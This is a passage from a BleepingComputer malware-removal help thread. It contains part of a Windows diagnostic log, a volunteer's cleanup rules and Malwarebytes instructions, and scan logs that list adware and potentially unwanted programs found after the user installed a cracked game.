FirewallRules: [{D5848F30-8989-4ED0-A862-D217CC76E64C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{84F794CA-B5E7-4DAB-8F87-837B60806A26}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{51C3E426-0F37-4DCD-87E4-A53E652DCD2C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{26F4CBDA-4371-4EAD-B563-EAE852FC431F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BDBA97C6-FD1B-42B8-88FC-9C16B6254642}] => (Allow) LPort=6892
FirewallRules: [{731C492E-74B2-4D2A-8779-E50950416C7D}] => (Allow) LPort=6892
FirewallRules: [TCP Query User{0255E972-67C9-4B8C-95DE-03323BD3FF0D}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{6E83EA68-00DC-4169-A094-F789E1757D69}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{891B98D6-3EF8-43F0-8406-A30710E90750}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1711.3015\gxxsvc.exe
FirewallRules: [TCP Query User{95CE1ED5-6506-482C-BC0E-FFFF7387BA8F}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [UDP Query User{E6DA95A3-DBE6-497B-A0FB-5D7ED847D4E2}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [{42583FD8-B4D0-4C0B-AC9E-40DA40E99806}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{88482871-4A19-4DD6-905E-E71355AEE5DF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9401402E-541B-4707-93B6-88E1D74B35AD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{BB633BA4-8699-4DBA-89F9-60BABF465FDC}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6011B792-0F73-43AB-9AE2-D2C47899117A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{5C2CC801-08FC-441F-8D6B-02AC83C928C7}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{51183DEC-D785-4AFF-887F-6ECF61F78025}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B6D1E1DD-0C00-4B29-B9A2-F7AE7933D0F5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{8624CD54-15CE-4C7B-BE37-4ABE95783052}] => (Allow) D:\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{1D42CF22-B020-4D14-A2B4-A4B91121279E}] => (Allow) D:\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{642A7421-22E5-4958-A5BC-4943709BA333}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{A2D74A89-F908-4D90-9B4F-2960AF36E9EE}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{DA3AD731-DB1D-4B85-91E6-B6D90DD0C3B5}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{FE9953FB-5543-49C2-8FD9-0E0EB15719FB}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{21F1A58F-C40D-484A-AD74-CE3B1DE57DDC}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe
FirewallRules: [{35377D1E-14D6-49B6-BBE2-DBC3981D1109}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe
FirewallRules: [{DA4F0A2C-8549-4F7D-ABE3-FA891833CA71}] => (Allow) C:\Users\ouroboros\AppData\Local\Go!\Application\go.exe
 
==================== Restore Points =========================
 
29-12-2017 12:37:51 Scheduled Checkpoint
05-01-2018 09:03:43 Restore Operation
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/05/2018 09:55:28 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW.  hr = 0x80070006, The handle is invalid.
.
 
 
Operation:
   Executing Asynchronous Operation
 
Context:
   Current State: DoSnapshotSet
 
Error: (01/05/2018 09:54:40 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {1b997ffc-8694-49fa-8e22-31687bc9855b}
 
Error: (01/05/2018 09:37:56 AM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Scheduled Checkpoint). Additional information: 0x80070005.
 
Error: (01/05/2018 09:19:47 AM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Scheduled Checkpoint). Additional information: 0x80070005.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Object List value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update First Help value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update First Counter value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Last Help value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Last Counter value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 01:58:47 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Object List value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
 
System errors:
=============
Error: (01/05/2018 10:13:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 10:06:45 AM) (Source: DCOM) (EventID: 10016) (User: ENJAY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ENJAY\ouroboros SID (S-1-5-21-1787623747-1286628437-3931833605-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:57:04 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\WINDOWS\System32\IWMSSvc.dll
 
Error: (01/05/2018 09:57:04 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\WINDOWS\System32\IWMSSvc.dll
 
 
CodeIntegrity:
===================================
  Date: 2018-01-05 10:18:19.571
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:18:19.570
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:15:19.218
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:15:19.216
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:13:02.435
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:13:02.433
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:20.496
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:20.494
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:18.730
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:18.728
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700HQ CPU @ 2.60GHz
Percentage of memory in use: 18%
Total physical RAM: 16322.59 MB
Available physical RAM: 13287.15 MB
Total Virtual: 18754.59 MB
Available Virtual: 15653.72 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:371.85 GB) (Free:31.33 GB) NTFS
Drive d: (DATA) (Fixed) (Total:558.91 GB) (Free:125.38 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: BFE03C85)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 07:43 AM

Hi oneiric :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)
 

Heeeey, so basically I tried downloading a cracked game a few days ago and it turns out to be a virus. Also whenever I start my laptop it pops up; it also pops up randomly.


Can you PM me the download link of that crack, or even better, the file you downloaded?

Edit: Also, follow the instructions below.

j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends of your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply

Edited by Aura, 05 January 2018 - 08:19 AM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 08:54 AM

Heeey Yoan, thanks for assisting. I PM'ed you the link.

 

Here's the export summary as well. Also, I've used this program before posting the issue and it did removed some of the files I think; just wanted to let you know.

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/5/18
Scan Time: 9:44 PM
Log File: 99d4c8d8-f21e-11e7-8381-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3629
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 377206
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 3 min, 35 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 09:54 AM

Can you provide me the past Malwarebytes logs showing the detections? We'll get to the clean-up right after. We're just trying to gather as much information as possible about this infection so we can pass it along to security vendors :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 10:22 AM

Here are the logs the showed detections.
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 11:58 PM
Log File: e1bb87bc-f09e-11e7-a25b-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3615
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379739
Threats Detected: 2
Threats Quarantined: 1
Time Elapsed: 3 min, 54 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 1
PUP.Optional.RussAd, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\lfgkmlldjpjacgicdjmmgcboihbghpal, Quarantined, [10], [475090],1.0.3615
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
PUP.Optional.RussAd, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [10], [475090],1.0.3615
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 2:45 PM
Log File: af000ac0-f051-11e7-9346-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3611
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 380015
Threats Detected: 149
Threats Quarantined: 144
Time Elapsed: 9 min, 13 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 35
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Yahoo! Powered fisal, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yahoo! Powered fisal, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [-1],0.0.0
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\BLTOPNCOMHOHOJ, Quarantined, [40], [474793],1.0.3611
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{09D44C2A-F732-482A-9D07-60B1ECD11A01}, Quarantined, [40], [474793],1.0.3611
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{09D44C2A-F732-482A-9D07-60B1ECD11A01}, Quarantined, [40], [474793],1.0.3611
PUP.Optional.hTab, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ELMKJJFKKCHOHAAOLJOBAFFJEEDCOOCJ, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.hTab, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\ELMKJJFKKCHOHAAOLJOBAFFJEEDCOOCJ, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.hTab, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\elmkjjfkkchohaaoljobaffjeedcoocj, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\NAHHMPBCKPGDIDFNMFKFGIFLPJIJILCE, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\NAHHMPBCKPGDIDFNMFKFGIFLPJIJILCE, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\nahhmpbckpgdidfnmfkfgiflpjijilce, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ, Quarantined, [489], [183362],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ, Quarantined, [489], [183362],1.0.3611
PUP.Optional.SearchManager, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pilplloabdedfmialnfchjomjmpjcoej, Quarantined, [489], [183362],1.0.3611
PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
